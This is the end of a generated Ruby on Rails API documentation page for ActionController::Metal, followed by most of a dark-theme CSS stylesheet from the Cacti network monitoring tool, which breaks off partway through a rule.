<span class="ruby-ivar">@_status</span> = <span class="ruby-constant">Rack</span><span class="ruby-operator">::</span><span class="ruby-constant">Utils</span>.<span class="ruby-identifier">status_code</span>(<span class="ruby-identifier">status</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-url_for">
<b>url_for</b>(string)
<a href="../../classes/ActionController/Metal.html#method-i-url_for" name="method-i-url_for" class="permalink">Link</a>
</div>
<div class="description">
<p>basic <a href="Metal.html#method-i-url_for">#url_for</a> that can be
overridden for more robust functionality</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-url_for_source')" id="l_method-i-url_for_source">show</a>
</p>
<div id="method-i-url_for_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 170</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">url_for</span>(<span class="ruby-identifier">string</span>)
<span class="ruby-identifier">string</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
</div>
</div>
</body>
</html> |
include/themes/dark/main.css | micke2k/cacti | /* main styles */
::-webkit-scrollbar {
width: 8px;
}
::-webkit-scrollbar-track {
-webkit-box-shadow: inset 0 0 6px rgba(22,22,6,0.7);
border-radius: 6px;
}
::-webkit-scrollbar-thumb {
border-radius: 6px;
background: rgba(49,68,43,0.8);
-webkit-box-shadow: inset 0 0 4px rgba(49,68,43,0.5);
}
body {
background: #161616 none repeat scroll 0 0;
color: #bbbfc2;
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
font-size: 12px;
margin: 0;
}
li {
/* background: #161616 none repeat scroll 0 0;*/
}
table, tr, td, textarea {
-ms-overflow-style:scrollbar;
}
body {
margin: 0px;
background-repeat: repeat-y;
}
table {
border-collapse: collapse; border-spacing: 0;
border: none;
text-align:left;
}
td, th {
padding: 2px;
margin: 0px;
}
img {
border:none;
vertical-align:middle;
}
/* links */
a, a:active {
color: #e3e3e3;
text-decoration: none;
font-size: 12px;
padding: 3px;
vertical-align: middle !important;
}
a:hover {
text-decoration: none;
color: #fff;
}
th i.fa {
margin-top: -5px;
position: absolute;
right: 3px;
top: 50%;
}
#main {
display:none;
z-index: 3;
}
input, select {
padding: 0.5em 0.5em 0.5em 0.5em;
font-size: 12px;
}
*:focus {
outline: none;
}
label {
white-space:nowrap;
}
.nowrap {
white-space:nowrap;
}
.right {
text-align:right !important;
}
.left {
text-align:left;
}
.center {
text-align:center;
}
.usermenudown {
background: transparent url('./../../../images/bullet_arrow_down.png') no-repeat center right;
}
.usermenuup {
background: transparent url('./../../../images/bullet_arrow_up.png') no-repeat center right;
}
.user {
padding-right:16px;
cursor:pointer;
}
.filter {
position:relative;
left: -20px;
margin-right: -10px;
font-size: 11px !important;
}
.badpassword_message {
padding:2px;
color:red;
font-size:1.0em !important;
vertical-align:bottom;
}
.badpassword {
padding:4px;
color:red;
font-size:1.5em !important;
vertical-align:bottom;
}
.goodpassword {
padding:4px;
color:green;
font-size:1.5em !important;
vertical-align:bottom;
}
.associated {
color:green;
}
.notAssociated {
color:red;
}
.disabled_row {
color:grey;
}
.disabled {
color:grey;
}
.idle {
color:green;
}
.running {
color:red;
}
.newObject{
color:blue;
}
.updateObject {
color:grey;
}
.unmetDependency {
color:red;
}
.foundDependency {
color:navy;
}
.success {
color:green;
}
.failed {
color:red;
}
.accessGranted {
color:green;
}
.accessGrantedItem {
color:green;
}
.accessRestricted {
color:red;
}
.accessRestrictedItem {
color:red;
}
.deleteIcon {
width:10px;
height:10px;
cursor:pointer;
padding:2px;
border:none;
}
.drillDown {
cursor:pointer;
}
.monoSpace {
font-size:10px;
font-family: monospace;
color: snow;
}
.utilityPick {
width: 200px;
}
.realms {
width:20%;
vertical-align:top;
white-space:nowrap;
}
.deviceUp {
color: #198e32;
}
.deviceDown {
color: #ff0000;
}
.deviceUnknown {
color: #0000ff;
}
.deviceDisabled {
color: #a1a1a1;
}
.deviceRecovering {
color: #ff8f1e;
}
.deviceError {
color: #750F7D;
}
.beingGraphed {
color: green;
}
.notBeingGraphed {
color: #484848;
}
.menuoptions {
background: none repeat scroll 0 0 #161616;
border-color: #161606;
border-style: solid;
border-width: 0px 1px 1px 1px;
z-index:4;
display:block;
float:right;
position:absolute;
right:26px;
top:22px;
list-style: none;
text-align:right;
margin:0px;
padding:0px;
}
.menuoptions li a {
border-top: 1px solid #161606;
display:block;
height:14px;
}
.menuoptions li a:hover {
display:block;
background: #45484d; /* Old browsers */
background: -moz-linear-gradient(top, #45484d 0%, #000000 100%); /* FF3.6+ */
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#45484d), color-stop(100%,#000000)); /* Chrome,Safari4+ */
background: -webkit-linear-gradient(top, #45484d 0%,#000000 100%); /* Chrome10+,Safari5.1+ */
background: -o-linear-gradient(top, #45484d 0%,#000000 100%); /* Opera 11.10+ */
background: -ms-linear-gradient(top, #45484d 0%,#000000 100%); /* IE10+ */
background: linear-gradient(to bottom, #45484d 0%,#000000 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#45484d', endColorstr='#000000',GradientType=0 ); /* IE6-9 */
}
.import_label {
opacity: 1;
}
.import_button {
opacity: 0;
display: none;
}
.import_text {
opacity: 1;
}
.color-icon {
background-image:none !important;
}
.emailtest {
cursor:pointer;
display:block;
float:right;
text-align:right;
}
.reloadquery {
cursor:pointer;
padding:2px;
vertical-align:middle;
color:lime;
font-size:14px;
}
.deletequery {
cursor:pointer;
padding:2px;
vertical-align:middle;
color:red;
font-size:14px
}
.odd {
background: none repeat scroll 0 0 #080808;
border: none;
box-shadow: 0 0 1px rgba(0, 0, 0, 0.1);
}
.even {
background: none repeat scroll 0 0 #0F0F0F;
border: none;
box-shadow: 0 0 1px rgba(0, 0, 0, 0.1);
}
.even-alternate {
background: none repeat scroll 0 0 #0F0F0F;
border: none;
box-shadow: 0 0 1px rgba(0, 0, 0, 0.1);
}
.saveRow {
background-color:#262626;
text-align:right;
padding:4px;
}
.treeArea, .treeItemsArea {
width:33%;
border:1px solid #006400;
}
.linkMarker {
color: #c16921;
}
.filteredValue {
background-color:#F8D93D;
}
.graphItemGr1Alt1 {
background-color: #EEEEEE;
}
.graphItemGr1Alt2 {
background-color: #EEEEEE;
}
.graphItemGr1Cust {
background-color: #D5D5D5;
}
.graphItemGr2Alt1 {
background-color: #E7E9F2;
}
.graphItemGr2Alt2 {
background-color: #E7E9F2;
}
.graphItemGr1Cust {
background-color: #D2D6E7;
}
.graphItemAdd {
background-color: #00438c;
}
.graphItemDel {
background-color: #C63636;
}
.graphItemHR {
color: #FF0000;
}
.hostUp {
color: #fff;
font-size: 10px;
font-family: monospace;
}
.hostDown {
color: #ff0000;
font-size: 10px;
font-family: monospace;
}
.cactiPageHead {
background: #161616 none repeat scroll 0 0;
height:30px;
width:100%;
position:fixed;
padding-top:5px;
top:0px;
left:0px;
z-index:4;
}
.cactiGraphPageHeadBackdrop {
background: transparent url("./images/cacti_logo.svg") no-repeat scroll left 40% / 380px auto;
padding-bottom: 0px;
float:right;
width:400px;
height:35px;
top:0px;
position:fixed;
right:0px;
z-index:-1;
}
.cactiConsolePageHeadBackdrop {
background: transparent url("./images/cacti_logo.svg") no-repeat scroll left 40% / 380px auto;
padding-bottom:0px;
float:right;
width:400px;
height:35px;
top:0px;
position:fixed;
right:0px;
z-index:-1;
}
.navigation {
}
.debug td {
padding:3px;
margin:0px;
}
.breadCrumbBar {
width:100%;
position:fixed;
padding:4px;
top:29px;
left:0px;
z-index:4;
background: rgba(76,76,76,1);
background: -moz-linear-gradient(top, rgba(76,76,76,1) 0%, rgba(89,89,89,1) 12%, rgba(102,102,102,1) 25%, rgba(71,71,71,1) 39%, rgba(44,44,44,1) 50%, rgba(0,0,0,1) 51%, rgba(17,17,17,1) 60%, rgba(43,43,43,1) 76%, rgba(28,28,28,1) 91%, rgba(19,19,19,1) 100%);
background: -webkit-gradient(left top, left bottom, color-stop(0%, rgba(76,76,76,1)), color-stop(12%, rgba(89,89,89,1)), color-stop(25%, rgba(102,102,102,1)), color-stop(39%, rgba(71,71,71,1)), color-stop(50%, rgba(44,44,44,1)), color-stop(51%, rgba(0,0,0,1)), color-stop(60%, rgba(17,17,17,1)), color-stop(76%, rgba(43,43,43,1)), color-stop(91%, rgba(28,28,28,1)), color-stop(100%, rgba(19,19,19,1)));
background: -webkit-linear-gradient(top, rgba(76,76,76,1) 0%, rgba(89,89,89,1) 12%, rgba(102,102,102,1) 25%, rgba(71,71,71,1) 39%, rgba(44,44,44,1) 50%, rgba(0,0,0,1) 51%, rgba(17,17,17,1) 60%, rgba(43,43,43,1) 76%, rgba(28,28,28,1) 91%, rgba(19,19,19,1) 100%);
background: -o-linear-gradient(top, rgba(76,76,76,1) 0%, rgba(89,89,89,1) 12%, rgba(102,102,102,1) 25%, rgba(71,71,71,1) 39%, rgba(44,44,44,1) 50%, rgba(0,0,0,1) 51%, rgba(17,17,17,1) 60%, rgba(43,43,43,1) 76%, rgba(28,28,28,1) 91%, rgba(19,19,19,1) 100%);
background: -ms-linear-gradient(top, rgba(76,76,76,1) 0%, rgba(89,89,89,1) 12%, rgba(102,102,102,1) 25%, rgba(71,71,71,1) 39%, rgba(44,44,44,1) 50%, rgba(0,0,0,1) 51%, rgba(17,17,17,1) 60%, rgba(43,43,43,1) 76%, rgba(28,28,28,1) 91%, rgba(19,19,19,1) 100%);
background: linear-gradient(to bottom, rgba(76,76,76,1) 0%, rgba(89,89,89,1) 12%, rgba(102,102,102,1) 25%, rgba(71,71,71,1) 39%, rgba(44,44,44,1) 50%, rgba(0,0,0,1) 51%, rgba(17,17,17,1) 60%, rgba(43,43,43,1) 76%, rgba(28,28,28,1) 91%, rgba(19,19,19,1) 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#4c4c4c', endColorstr='#131313', GradientType=0 );
}
ul#breadcrumbs {
font-size:8px;
margin: 0 0 1px 0;
padding: 0;
list-style: none;
}
.infoBar{
background: #161606;
border-width: 1px;
border-style: solid;
padding:0.5px 8px 0.5px 5px;
white-space: nowrap;
border-color: #161616;
border-radius: 5px;
box-shadow: 0 0 2px rgba(0,0,0,.2);
overflow: hidden;
display: block;
min-width: 15%;
max-width: 40%;
margin-right:10px;
float: right;
text-align: right;
}
#breadcrumbs {
background: #161606;
border-width: 1px;
border-style: solid;
border-color: #161616;
border-radius: 5px;
white-space:nowrap;
max-width:100%;
box-shadow: 0 0 2px rgba(0,0,0,.2);
overflow: hidden;
max-width: 60%;
min-width: 30%;
float:left;
}
#breadcrumbs li {
float: left;
}
#breadcrumbs a {
padding: .4em 1em .2em 2em;
float: left;
text-decoration: none;
color: #FFFFFF;
position: relative;
font-size:10px;
text-shadow: 0 1px 0 rgba(255, 255, 255, 0.5);
background-color: #505050;
background-image: linear-gradient(to right, #161606, #505050);
}
#breadcrumbs li:first-child a {
padding-left: 1em;
border-radius: 5px 0 0 5px;
}
#breadcrumbs a:hover {
background: #505050;
}
#breadcrumbs a::after,
#breadcrumbs a::before {
content: "";
position: absolute;
top: 50%;
margin-top: -1.5em;
border-top: 1.5em solid transparent;
border-bottom: 1.5em solid transparent;
border-left: 1.1em solid;
right: -1em;
}
#breadcrumbs a::after {
z-index: 4;
border-left-color: #505050;
}
#breadcrumbs a::before {
border-left-color: #161606;
right: -1.1em;
z-index: 3;
}
#breadcrumbs a:hover::after {
border-left-color: #505050;
}
#breadcrumbs .current,
#breadcrumbs .current:hover {
background: none;
}
#breadcrumbs .current::after,
#breadcrumbs .current::before {
content: normal;
}
.cactiContent {
background: #161616 none repeat scroll 0 0;
width: 100%;
vertical-align: top;
padding-top: 56px;
}
.cactiTreeNavigationArea {
background: #161616;
border-right: #aaaaaa 1px solid;
padding-left: 5px;
padding-right: 5px;
padding-top: 10px;
display: none;
vertical-align: top;
position: fixed;
left: 0px;
top: 56px;
z-index: 2;
overflow-x: hidden;
overflow-y: hidden;
}
.jstree {
position:relative;
display:block;
}
.cactiConsoleNavigationArea {
background: #161616;
border-right: #aaaaaa 1px solid;
padding-left:0px;
padding-right:0px;
padding-top:5px;
vertical-align:top;
position: fixed;
left: 0px;
top: 56px;
overflow-y: hidden;
width: 167px;
}
.cactiConsoleNavigationArea table {
width:162px;
}
.cactiLogo {
background: #161616 url('./images/cacti_logo.svg') no-repeat 30px;
display:block;
cursor:pointer;
padding-bottom:178px;
margin-bottom:60px;
width:146px;
margin-top:-6px;
margin-left:2px;
margin-right:2px;
}
.loginLeft, .logoutLeft {
width:33%;
float:left;
}
.loginCenter, .logoutCenter {
-moz-border-radius:10px;
border-radius:10px;
position:relative;
padding:30px 0px 5px 20px;
background-color:snow;
top:30%;
max-width:360px;
max-height:300px;
margin-left:auto;
margin-right:auto;
background-image: -ms-linear-gradient(top, #363636 0%, #071204 100%);
background-image: -moz-linear-gradient(top, #363636 0%, #071204 100%);
background-image: -o-linear-gradient(top, #363636 0%, #071204 100%);
background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #363636), color-stop(100, #071204));
background-image: -webkit-linear-gradient(top, #363636 0%, #071204 100%);
background-image: linear-gradient(to bottom, #363636 0%, #071204 100%);
text-shadow: 1px 1px 1px rgba(9, 61, 16, 0.66);
}
.cactiLoginLogo, .cactiLogoutLogo {
position:relative;
float:right;
background: transparent url('./images/cacti_logo.svg') no-repeat center;
width:120px;
height:148px;
z-index:2;
margin-top:-95px;
margin-left:240px;
margin-bottom:-20px;
}
.loginArea, .logoutArea {
-moz-border-radius:10px;
border-radius:10px;
position:relative;
min-height:200px;
}
.cactiLoginTable td {
padding-bottom:6px;
padding-right:6px;
}
.loginErrors, .logoutErrors {
color:red;
min-height:15px;
}
legend {
font-size:22px;
}
.loginRight, .logoutRight {
width:33%;
float:right;
}
.loginBody, .logoutBody {
background: #161616; /* Old browsers */
background-image: -ms-linear-gradient(top, #161616 0%, #000000 100%);
background-image: -moz-linear-gradient(top, #161616 0%, #000000 100%);
background-image: -o-linear-gradient(top, #161616 0%, #000000 100%);
background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #161616), color-stop(100, #000000));
background-image: -webkit-linear-gradient(top, #161616 0%, #000000 100%);
background-image: linear-gradient(to bottom, #161616 0%, #000000 100%);
}
.versionInfo {
padding-top:5px;
float:right;
margin-top:10px;
color:snow;
}
.actionsDropdown {
vertical-align:middle;
width:100%;
line-height:10px;
}
.cactiTooltipHint {
cursor: pointer;
padding:5px;
font-size:14px !important;
}
.spikekillData, .spikekillData td {
border: 1px solid #999;
}
.spikekillNote {
padding: 1px;
}
.spikekillMenu {
background: #f5f5f5 none repeat scroll 0 0;
border: 1px solid #373737;
box-shadow: 2px 2px 2px #292929;
margin: 0;
padding: 2px;
line-height: 1.5em;
}
.spikekillMenu li {
color: snow;
vertical-align:middle;
}
.spikekillMenu i {
text-align:center;
width: 2.0em;
display:inline-block;
}
.spikekillMenu i:empty{
width: 2.0em;
display:inline-block;
}
.loginPanel {
padding:4px 0px;
}
.treeTable {
width:100%;
}
.cactiGraphContentArea {
background: #161616;
padding-top: 10px;
padding-right: 5px;
padding-left: 5px;
display: none;
vertical-align: top;
}
.cactiGraphContentAreaPreview {
background: #161616;
padding-top: 10px;
padding-right: 5px;
padding-left: 5px;
display: none;
vertical-align: top;
}
.cactiConsoleContentArea {
background: #161616;
padding-top: 10px;
padding-right: 5px;
padding-left: 5px;
vertical-align: top;
display: none;
margin-left: 168px;
}
.hyperLink {
color: #006400;
font-size: 12px;
padding: 3px;
cursor:pointer;
text-decoration: none;
}
.noLinkEditMain {
color: rgba(44,130,29,1);
text-decoration: none;
font-size: 12px;
font-weight: normal;
padding: 3px;
white-space: nowrap;
}
.linkEditMain, .linkEditMain:active {
color: rgba(44,130,29,1);
text-decoration: none;
font-size: 12px;
font-weight: normal;
padding: 3px;
white-space: nowrap;
cursor:pointer;
}
.linkEditMain:hover {
color: rgba(31,59,8,1);
white-space: nowrap;
text-decoration: none;
}
.linkOverDark, .linkOverDark:active {
color: white;
font-weight: normal;
text-decoration: none;
cursor: pointer;
}
.linkOverDark:hover {
color: white;
text-decoration: none;
}
/* text styles */
.textError {
font-size: 12px;
font-weight: normal;
color: red !important;
}
.textInfo {
font-size: 12px;
font-weight: bold;
color: snow;
}
.textHeader {
font-size: 12px;
font-weight: normal;
}
.bold {
font-weight: bold;
}
.remover {
cursor:pointer;
}
.messageBox {
margin-bottom:5px;
padding:5px;
color: snow;
background-color: #161616;
border:1px solid #161616;
max-width:100%;
position:relative;
z-index: 6;
}
.textHeaderDark {
font-size: 12px;
font-weight: normal;
color: snow;
}
.templateHeader {
background: rgba(76,76,76,1);
background: -moz-linear-gradient(top, rgba(76,76,76,1) 0%, rgba(89,89,89,1) 12%, rgba(102,102,102,1) 25%, rgba(71,71,71,1) 39%, rgba(44,44,44,1) 50%, rgba(0,0,0,1) 51%, rgba(17,17,17,1) 60%, rgba(43,43,43,1) 76%, rgba(28,28,28,1) 91%, rgba(19,19,19,1) 100%);
background: -webkit-gradient(left top, left bottom, color-stop(0%, rgba(76,76,76,1)), color-stop(12%, rgba(89,89,89,1)), color-stop(25%, rgba(102,102,102,1)), color-stop(39%, rgba(71,71,71,1)), color-stop(50%, rgba(44,44,44,1)), color-stop(51%, rgba(0,0,0,1)), color-stop(60%, rgba(17,17,17,1)), color-stop(76%, rgba(43,43,43,1)), color-stop(91%, rgba(28,28,28,1)), color-stop(100%, rgba(19,19,19,1)));
background: -webkit-linear-gradient(top, rgba(76,76,76,1) 0%, rgba(89,89,89,1) 12%, rgba(102,102,102,1) 25%, rgba(71,71,71,1) 39%, rgba(44,44,44,1) 50%, rgba(0,0,0,1) 51%, rgba(17,17,17,1) 60%, rgba(43,43,43,1) 76%, rgba(28,28,28,1) 91%, rgba(19,19,19,1) 100%);
background: -o-linear-gradient(top, rgba(76,76,76,1) 0%, rgba(89,89,89,1) 12%, rgba(102,102,102,1) 25%, rgba(71,71,71,1) 39%, rgba(44,44,44,1) 50%, rgba(0,0,0,1) 51%, rgba(17,17,17,1) 60%, rgba(43,43,43,1) 76%, rgba(28,28,28,1) 91%, rgba(19,19,19,1) 100%);
background: -ms-linear-gradient(top, rgba(76,76,76,1) 0%, rgba(89,89,89,1) 12%, rgba(102,102,102,1) 25%, rgba(71,71,71,1) 39%, rgba(44,44,44,1) 50%, rgba(0,0,0,1) 51%, rgba(17,17,17,1) 60%, rgba(43,43,43,1) 76%, rgba(28,28,28,1) 91%, rgba(19,19,19,1) 100%);
background: linear-gradient(to bottom, rgba(76,76,76,1) 0%, rgba(89,89,89,1) 12%, rgba(102,102,102,1) 25%, rgba(71,71,71,1) 39%, rgba(44,44,44,1) 50%, rgba(0,0,0,1) 51%, rgba(17,17,17,1) 60%, rgba(43,43,43,1) 76%, rgba(28,28,28,1) 91%, rgba(19,19,19,1) 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#4c4c4c', endColorstr='#131313', GradientType=0 );
}
.templateHeader td {
padding:3px;
}
.textSubHeaderDark {
font-size: 11px;
color: snow;
font-weight: normal;
}
.cactiTable {
width: 100%;
margin-left:auto;
margin-right:auto;
}
.cactiTableTitle {
width: 100%;
background-color: #262626;
}
.cactiTableTitle td {
line-height: 16px;
padding: 4px;
}
.cactiDebugTable {
width: 100%;
}
.filterTable {
white-space:nowrap;
}
.filterTable td:first-child {
width:55px;
}
.formItemDescription {
}
.formItemName {
color:snow;
}
.graphItem {
background-color: #362616;
}
.graphItemAlternate {
background-color: #262606;
}
.break {
height:8px;
}
.next {
padding-right:6px;
padding-left:6px;
}
.previous {
padding-right:6px;
padding-left:6px;
}
.cactiNavBarTop {
background-image: -webkit-gradient(
linear,
left top,
left bottom,
color-stop(0, #252426),
color-stop(1, #0C0D0D)
);
background-image: -o-linear-gradient(bottom, #252426 0%, #0C0D0D 100%);
background-image: -moz-linear-gradient(bottom, #252426 0%, #0C0D0D 100%);
background-image: -webkit-linear-gradient(bottom, #252426 0%, #0C0D0D 100%);
background-image: -ms-linear-gradient(bottom, #252426 0%, #0C0D0D 100%);
background-image: linear-gradient(to bottom, #252426 0%, #0C0D0D 100%);
}
.cactiNavBarBottom {
background-color: #00438c;
}
.tableHeader {
background: #45484d; /* Old browsers */
background: -moz-linear-gradient(top, #45484d 0%, #000000 100%); /* FF3.6+ */
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#45484d), color-stop(100%,#000000)); /* Chrome,Safari4+ */
background: -webkit-linear-gradient(top, #45484d 0%,#000000 100%); /* Chrome10+,Safari5.1+ */
background: -o-linear-gradient(top, #45484d 0%,#000000 100%); /* Opera 11.10+ */
background: -ms-linear-gradient(top, #45484d 0%,#000000 100%); /* IE10+ */
background: linear-gradient(to bottom, #45484d 0%,#000000 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#45484d', endColorstr='#000000',GradientType=0 ); /* IE6-9 */
}
th.sortable {
cursor:pointer;
line-height:10px;
}
.tableHeader th {
color: snow;
cursor: pointer;
vertical-align:middle;
text-align:left;
font-size: 12px;
font-weight: normal;
}
.tableHeader th div {
display:block;
padding-right:8px;
font-size:12px;
}
.tableSubHeaderColumn {
color: snow;
vertical-align:middle;
text-align:left;
cursor:pointer;
}
.graphSubHeaderColumn {
color: #snow;
font-size:12px;
vertical-align:middle;
text-align:left;
padding:3px;
}
.tableSubHeaderCheckbox {
width:1%;
background: #45484d; /* Old browsers */
background: -moz-linear-gradient(top, #45484d 0%, #000000 100%); /* FF3.6+ */
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#45484d), color-stop(100%,#000000)); /* Chrome,Safari4+ */
background: -webkit-linear-gradient(top, #45484d 0%,#000000 100%); /* Chrome10+,Safari5.1+ */
background: -o-linear-gradient(top, #45484d 0%,#000000 100%); /* Opera 11.10+ */
background: -ms-linear-gradient(top, #45484d 0%,#000000 100%); /* IE10+ */
background: linear-gradient(to bottom, #45484d 0%,#000000 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#45484d', endColorstr='#000000',GradientType=0 ); /* IE6-9 */
}
.image_table {
width:100%;
}
.tableConfirmation {
width:100%;
text-align:center;
background-color: #f5f5f5;
border: 1px solid #aaaaaa;
}
.navBar {
min-width:30%;
white-space:nowrap;
}
.navBarNavigation {
color: white;
text-align:center;
margin-left:auto;
margin-right:auto;
}
.navBarNavigationCenter {
width:80%;
text-align:center;
}
.navBarNavigationPrevious {
width:10%;
text-align:left;
cursor:pointer;
}
.navBarNavigationNext {
width:10%;
text-align:right;
cursor:pointer;
}
.navBarNavigationNext i.ui-icon {
margin-top: -16px;
margin-right: -16px;
top:50%;
}
.navBarNavigationPrevious i.ui-icon {
margin-bottom: -16px;
margin-left: -16px;
top:50%;
}
.textArea {
font-size: 12px;
background-color:#161616;
}
.textArea a {
font-size: 1.1em;
}
.popupBox {
z-index: 2;
position: absolute;
padding: 0px;
display: none;
overflow: auto;
color: snow;
background-color:#e5e5e5;
border:1px solid #e5e5e5;
}
.installArea {
background-color: snow;
padding: 10px;
}
.textAreaNotes {
font-size: 12px;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
.textEditTitle {
font-weight: normal;
}
.textMenuHeader {
color: snow;
background-color: #9C9C9C;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
font-weight: normal;
}
.textMenuItem {
background-color: #efefef;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
}
.textMenuSubItem {
background-color: snow;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
}
.textMenuItemSelected {
background-color: #E1E1E1;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px;
}
.txtErrorTextBox {
border: 2px solid #ff0000 !important;
}
.txtErrorText {
color: #FF0000;
font-size: 12px;
font-weight: normal;
}
/* tabs */
.tabSpacer {
width:0px;
padding-right:2px;
padding-left:0px;
}
.tabsMarginLeft {
padding-left:2px;
}
.tabSelected {
background-color:silver;
white-space:nowrap;
width:1%;
}
.tabNotSelected {
background-color:#dfdfdf;
white-space:nowrap;
width:1%;
}
.deleteMarker {
color: red !important;
height: 14px !important;
vertical-align: middle;
text-decoration: none !important;
}
.deleteMarker:hover {
text-decoration: none !important;
}
.moveArrow {
color: #00438C !important;
height: 14px !important;
vertical-align: middle;
text-decoration: none !important;
}
.moveArrow:hover {
text-decoration: none !important;
}
.moveArrowNone {
padding-left:15px;
}
.action, .shiftArrow, .calendar {
cursor: pointer;
padding:2px;
}
td.tab {
border-top: 1px solid #999;
border-right: 1px solid #666;
border-left: 1px solid #999;
padding-left:3px;
padding-right:3px;
min-width:0%;
border-bottom: none;
border-top-left-radius: 4px;
border-top-right-radius: 4px;
-moz-border-radius-topright: 4px;
-moz-border-radius-topleft: 4px;
}
div#tabs {
vertical-align: bottom;
position: fixed;
top: 5px;
}
td#tabs {
padding:0px !important;
}
.cactiGraphHeaderBackground {
background: transparent url("./images/cacti_logo.svg") no-repeat scroll left 10% / 380px auto;
height: 35px;
width:500px;
float:right;
position:fixed;
top: 0px;
right: 0px;
z-index:-1;
}
div#gtabs {
padding-bottom: 0px;
vertical-align: bottom;
position:fixed;
right: 5px;
top: 5px;
height: 30px;
}
.tabs a, .maintabs a {
-moz-border-radius:5px 5px 0 0;
border-radius:5px 5px 0 0;
background: #222222 url("images/ui-bg_highlight-soft_35_222222_1x100.png") repeat-x scroll 50% 50%;
color:snow;
float:left !important;
padding:5px;
text-decoration:none;
vertical-align:bottom;
}
.tabs a:hover, .maintabs a:hover {
border: 0px solid #155413;
background: #155413 url("images/ui-bg_highlight-soft_33_155413_1x100.png") 50% 50% repeat-x;
}
.tabs a.selected, .maintabs a.selected {
background: #31442b url("images/ui-bg_highlight-hard_20_31442b_1x100.png") repeat-x scroll 50% 50%;
}
.tabs li, .maintabs li {
bottom:-1px;
float:left;
margin:0 3px 0 0;
position:relative;
}
.tabs li.current a, .maintabs li.current a {
background:#fff;
border-bottom:1px solid #fff;
}
.tabs li.current a:hover, .maintabs li.current a:hover {
background:#fff;
border-bottom:1px solid #fff;
}
.tabs nav, .maintabs nav {
padding:0 0 0 4px;
zoom:1;
}
.tabs nav:after, .maintabs nav:after {
clear:both;
content:".";
display:block;
height:0;
visibility:hidden;
}
.tabs ul, .maintabs ul {
list-style:none;
margin:0;
padding:0;
}
/* Navigation Area */
#nav {
float: left;
width: 150px;
border-top: 0px solid #151515;
border-right: 0px solid #151515;
border-left: 0px solid #151515;
font-size:12px;
margin: 0px 0;
}
#nav li a {
display: block;
padding: 2px 4px;
background: #ccc;
border-top: 1px solid #151515;
border-bottom: 1px solid #151515;
text-decoration: none;
color: #fff;
}
#nav li a.active {
color: snow;
background: #45484d; /* Old browsers */
background: -moz-linear-gradient(top, #45484d 0%, #000000 100%); /* FF3.6+ */
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#45484d), color-stop(100%,#000000)); /* Chrome,Safari4+ */
background: -webkit-linear-gradient(top, #45484d 0%,#000000 100%); /* Chrome10+,Safari5.1+ */
background: -o-linear-gradient(top, #45484d 0%,#000000 100%); /* Opera 11.10+ */
background: -ms-linear-gradient(top, #45484d 0%,#000000 100%); /* IE10+ */
background: linear-gradient(to bottom, #45484d 0%,#000000 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#45484d', endColorstr='#000000',GradientType=0 ); /* IE6-9 */
}
th {
border-right: 1px groove #eee;
}
th:last-child {
border-right: none !important;
}
tr.selected {
background: rgba(167,217,134,1);
background: -moz-linear-gradient(top, rgba(167,217,134,1) 0%, rgba(148,179,107,1) 100%);
background: -webkit-gradient(left top, left bottom, color-stop(0%, rgba(167,217,134,1)), color-stop(100%, rgba(148,179,107,1)));
background: -webkit-linear-gradient(top, rgba(167,217,134,1) 0%, rgba(148,179,107,1) 100%);
background: -o-linear-gradient(top, rgba(167,217,134,1) 0%, rgba(148,179,107,1) 100%);
background: -ms-linear-gradient(top, rgba(167,217,134,1) 0%, rgba(148,179,107,1) 100%);
background: linear-gradient(to bottom, rgba(167,217,134,1) 0%, rgba(148,179,107,1) 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#a7d986', endColorstr='#94b36b', GradientType=0 );
color:#000000;
}
tr.selectable:hover:not(.selected){
background: rgba(167,217,134,0.4);
background: -moz-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
background: -webkit-gradient(left top, left bottom, color-stop(0%, rgba(167,217,134,0.4)), color-stop(100%, rgba(148,179,107,0.2)));
background: -webkit-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
background: -o-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
background: -ms-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
background: linear-gradient(to bottom, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#a7d986', endColorstr='#94b36b', GradientType=0 );
}
tr.selected a {
color:black;
}
#nav li a.pic:hover, #nav li a.selected {
background: rgba(167,217,134,0.4);
background: -moz-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
background: -webkit-gradient(left top, left bottom, color-stop(0%, rgba(167,217,134,0.4)), color-stop(100%, rgba(148,179,107,0.2)));
background: -webkit-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
